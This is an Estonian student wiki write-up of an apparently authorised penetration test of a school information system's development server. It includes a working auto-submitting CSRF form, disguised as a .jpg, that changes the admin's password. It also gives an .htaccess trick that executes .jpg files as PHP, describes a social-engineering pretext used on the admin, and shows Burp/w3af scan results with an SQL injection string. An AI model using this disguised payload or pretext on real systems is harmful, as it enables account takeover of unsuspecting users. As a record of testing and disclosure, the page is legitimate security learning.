JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
===Burp suite===

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

=== Matise tegevus ===

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Tegijad ==
Alo Konno<br>
Urmo Lihten<br>
Taavi Podžuks<br>
Matis Alliksoo<br>
Sander Saarm